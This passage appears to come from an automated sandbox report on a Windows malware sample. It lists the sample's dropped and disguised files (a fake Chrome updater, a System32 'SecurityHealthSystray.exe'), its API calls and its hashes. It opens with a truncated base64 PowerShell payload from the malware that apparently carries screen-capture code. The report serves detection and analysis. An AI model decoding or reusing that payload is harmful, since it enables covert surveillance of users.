CAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B32253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,2_2_000001F91B32253C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B3228C8 NtEnumerateValueKey,NtEnumerateValueKey,2_2_000001F91B3228C8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B322B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,2_2_000001F91B322B2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201D1A42B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,4_2_00000201D1A42B2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201D1A42244 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,4_2_00000201D1A42244
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201D1A4253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,4_2_00000201D1A4253C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201D1A428C8 NtEnumerateValueKey,NtEnumerateValueKey,4_2_00000201D1A428C8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201D1A427FC NtEnumerateKey,NtEnumerateKey,4_2_00000201D1A427FC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201D1A4202C NtQuerySystemInformation,StrCmpNIW,4_2_00000201D1A4202C
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00D97FD3: _wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00D97FD3
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Windows\Prefetch\HpQPPZazcv.exe
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile created: C:\Windows\Prefetch\7963a3365bd9f9
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC43F2928123D49B6B141C06767811123.TMP
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC43F2928123D49B6B141C06767811123.TMP
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00D9F9630_2_00D9F963
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00D999060_2_00D99906
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DAEA070_2_00DAEA07
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DA8C7E0_2_00DA8C7E
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DA60F70_2_00DA60F7
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DC40440_2_00DC4044
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DA91110_2_00DA9111
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DA21250_2_00DA2125
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DA82D00_2_00DA82D0
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00D9E3940_2_00D9E394
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DA64450_2_00DA6445
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DA14760_2_00DA1476
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DA976F0_2_00DA976F
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DB77380_2_00DB7738
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DA09490_2_00DA0949
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DB79670_2_00DB7967
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DBFA900_2_00DBFA90
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00D93AB70_2_00D93AB7
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00D94C6E0_2_00D94C6E
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DA5E860_2_00DA5E86
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00D92FCB0_2_00D92FCB
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DA0FAC0_2_00DA0FAC
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DBFF3E0_2_00DBFF3E
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D0210381_2_00007FF67D021038
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D017F4C1_2_00007FF67D017F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D0079601_2_00007FF67D007960
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D0264701_2_00007FF67D026470
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D0273BC1_2_00007FF67D0273BC
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D012E501_2_00007FF67D012E50
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D026E701_2_00007FF67D026E70
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D0266EC1_2_00007FF67D0266EC
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D011D901_2_00007FF67D011D90
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D01E5B01_2_00007FF67D01E5B0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D017D981_2_00007FF67D017D98
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D017F4C1_2_00007FF67D017F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D0090D01_2_00007FF67D0090D0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D02A0F81_2_00007FF67D02A0F8
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D01E11C1_2_00007FF67D01E11C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D001F501_2_00007FF67D001F50
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D011F941_2_00007FF67D011F94
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D0187D01_2_00007FF67D0187D0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D0137E01_2_00007FF67D0137E0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D021FE41_2_00007FF67D021FE4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D0160301_2_00007FF67D016030
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D02481C1_2_00007FF67D02481C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D0119801_2_00007FF67D011980
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D0121A01_2_00007FF67D0121A0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D01A5301_2_00007FF67D01A530
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D0210381_2_00007FF67D021038
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D0243801_2_00007FF67D024380
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D011B841_2_00007FF67D011B84
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D0123A41_2_00007FF67D0123A4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D013BE41_2_00007FF67D013BE4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D01EC301_2_00007FF67D01EC30
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B2FD0E02_2_000001F91B2FD0E0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B3038A82_2_000001F91B3038A8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B2F1F2C2_2_000001F91B2F1F2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B322B2C2_2_000001F91B322B2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B33AEC22_2_000001F91B33AEC2
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B32DCE02_2_000001F91B32DCE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B3344A82_2_000001F91B3344A8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B35D0E02_2_000001F91B35D0E0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B3638A82_2_000001F91B3638A8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B351F2C2_2_000001F91B351F2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF7272610002_2_00007FF727261000
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF727285C742_2_00007FF727285C74
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF72727FBD82_2_00007FF72727FBD8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF7272750402_2_00007FF727275040
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF72727D8802_2_00007FF72727D880
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF7272710742_2_00007FF727271074
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF7272728C02_2_00007FF7272728C0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF7272857282_2_00007FF727285728
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF72727FBD82_2_00007FF72727FBD8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF727271F302_2_00007FF727271F30
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF727282F202_2_00007FF727282F20
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF727269FCD2_2_00007FF727269FCD
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF72726979B2_2_00007FF72726979B
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF727270E702_2_00007FF727270E70
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF727284F102_2_00007FF727284F10
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF72727CD6C2_2_00007FF72727CD6C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF7272695FB2_2_00007FF7272695FB
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF7272714842_2_00007FF727271484
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF727270C642_2_00007FF727270C64
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF727272CC42_2_00007FF727272CC4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF727268B202_2_00007FF727268B20
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF727280B842_2_00007FF727280B84
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF7272833BC2_2_00007FF7272833BC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF7272773F42_2_00007FF7272773F4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF727288A382_2_00007FF727288A38
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF7272712802_2_00007FF727271280
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF727270A602_2_00007FF727270A60
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF727277AAC2_2_00007FF727277AAC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF72728518C2_2_00007FF72728518C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF7272791B02_2_00007FF7272791B0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF72727D2002_2_00007FF72727D200
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 3_2_00007FFE133075083_2_00007FFE13307508
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201CFD938A84_2_00000201CFD938A8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201CFD8D0E04_2_00000201CFD8D0E0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201CFD81F2C4_2_00000201CFD81F2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201D1A42B2C4_2_00000201D1A42B2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201D1A4DCE04_2_00000201D1A4DCE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201D1A544A84_2_00000201D1A544A8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201D1A71F2C4_2_00000201D1A71F2C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201D1A7D0E04_2_00000201D1A7D0E0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201D1A838A84_2_00000201D1A838A8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF7272610004_2_00007FF727261000
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF7272695FB4_2_00007FF7272695FB
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF727285C744_2_00007FF727285C74
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF7272750404_2_00007FF727275040
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF72727D8804_2_00007FF72727D880
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF7272710744_2_00007FF727271074
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF7272728C04_2_00007FF7272728C0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF7272857284_2_00007FF727285728
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF72727FBD84_2_00007FF72727FBD8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF727271F304_2_00007FF727271F30
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF727282F204_2_00007FF727282F20
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF727269FCD4_2_00007FF727269FCD
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF72726979B4_2_00007FF72726979B
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF727270E704_2_00007FF727270E70
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF727284F104_2_00007FF727284F10
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF72727CD6C4_2_00007FF72727CD6C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF7272714844_2_00007FF727271484
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF727270C644_2_00007FF727270C64
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF727272CC44_2_00007FF727272CC4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF727268B204_2_00007FF727268B20
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF727280B844_2_00007FF727280B84
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF7272833BC4_2_00007FF7272833BC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF7272773F44_2_00007FF7272773F4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF72727FBD84_2_00007FF72727FBD8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF727288A384_2_00007FF727288A38
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF7272712804_2_00007FF727271280
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF727270A604_2_00007FF727270A60
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF727277AAC4_2_00007FF727277AAC
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF72728518C4_2_00007FF72728518C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF7272791B04_2_00007FF7272791B0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF72727D2004_2_00007FF72727D200
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAA812F04_2_00007FFDFAA812F0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAA818D04_2_00007FFDFAA818D0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABAB3704_2_00007FFDFABAB370
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABEFC004_2_00007FFDFABEFC00
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAC07B904_2_00007FFDFAC07B90
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABAF8B54_2_00007FFDFABAF8B5
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABA14514_2_00007FFDFABA1451
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABA1DCF4_2_00007FFDFABA1DCF
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABA19564_2_00007FFDFABA1956
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABA19974_2_00007FFDFABA1997
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABA13984_2_00007FFDFABA1398
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABA1A874_2_00007FFDFABA1A87
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABB11A04_2_00007FFDFABB11A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABA13F24_2_00007FFDFABA13F2
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABA114F4_2_00007FFDFABA114F
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABA1C944_2_00007FFDFABA1C94
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABA15374_2_00007FFDFABA1537
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABA6BA04_2_00007FFDFABA6BA0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAC009504_2_00007FFDFAC00950
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABA15B44_2_00007FFDFABA15B4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABA115E4_2_00007FFDFABA115E
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABA168B4_2_00007FFDFABA168B
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABA256D4_2_00007FFDFABA256D
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAC002504_2_00007FFDFAC00250
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAC507404_2_00007FFDFAC50740
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABA20AE4_2_00007FFDFABA20AE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABA1BDB4_2_00007FFDFABA1BDB
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAFB44604_2_00007FFDFAFB4460
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAC6655F4_2_00007FFDFAC6655F
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAC66A874_2_00007FFDFAC66A87
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAE17BC04_2_00007FFDFAE17BC0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAE03B804_2_00007FFDFAE03B80
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAC621B74_2_00007FFDFAC621B7
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAC622E84_2_00007FFDFAC622E8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAC641654_2_00007FFDFAC64165
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAC63FDA4_2_00007FFDFAC63FDA
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFACCFA004_2_00007FFDFACCFA00
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAC660A04_2_00007FFDFAC660A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFB4358A04_2_00007FFDFB4358A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF212F204_2_00007FFDFF212F20
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF1A7BC04_2_00007FFDFF1A7BC0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF1AF7104_2_00007FFDFF1AF710
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF2125704_2_00007FFDFF212570
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF19E4F04_2_00007FFDFF19E4F0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF1B0F904_2_00007FFDFF1B0F90
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF19DFC04_2_00007FFDFF19DFC0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF1AAFA04_2_00007FFDFF1AAFA0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF2180104_2_00007FFDFF218010
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF2000404_2_00007FFDFF200040
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF1E80504_2_00007FFDFF1E8050
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF250ED04_2_00007FFDFF250ED0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF1C1EC04_2_00007FFDFF1C1EC0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF1BAEF04_2_00007FFDFF1BAEF0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF202F204_2_00007FFDFF202F20
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF1EFF204_2_00007FFDFF1EFF20
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF240D904_2_00007FFDFF240D90
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF1B1E004_2_00007FFDFF1B1E00
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF1D5E504_2_00007FFDFF1D5E50
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF200E304_2_00007FFDFF200E30
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF1F1C904_2_00007FFDFF1F1C90
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFF198C604_2_00007FFDFF198C60
                                  Source: Joe Sandbox ViewDropped File: C:\Program Files\Google\Chrome\updater.exe BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\setup.exe BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FF727262760 appears 36 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFAC0D7E5 appears 101 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFF198800 appears 38 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFAC61EF1 appears 72 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FF7272625F0 appears 100 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFABA12EE appears 562 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFAC64057 appears 70 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFAC0D74F appears 214 times
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: String function: 00007FFDFF199660 appears 44 times
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: String function: 00007FF67D002B30 appears 47 times
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: String function: 00DB1D60 appears 31 times
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: String function: 00DB1590 appears 57 times
                                  Source: unicodedata.pyd.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                  Source: rar.exe.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                  Source: unicodedata.pyd.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                  Source: wxyubnjmnlae.tmp.18.drStatic PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Source: setup.exe.7.drStatic PE information: Number of sections : 11 > 10
                                  Source: updater.exe.18.drStatic PE information: Number of sections : 11 > 10
                                  Source: 8Ck8T5qRcC.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: libcrypto-1_1.dll.2.drStatic PE information: Section: UPX1 ZLIB complexity 0.998771639088251
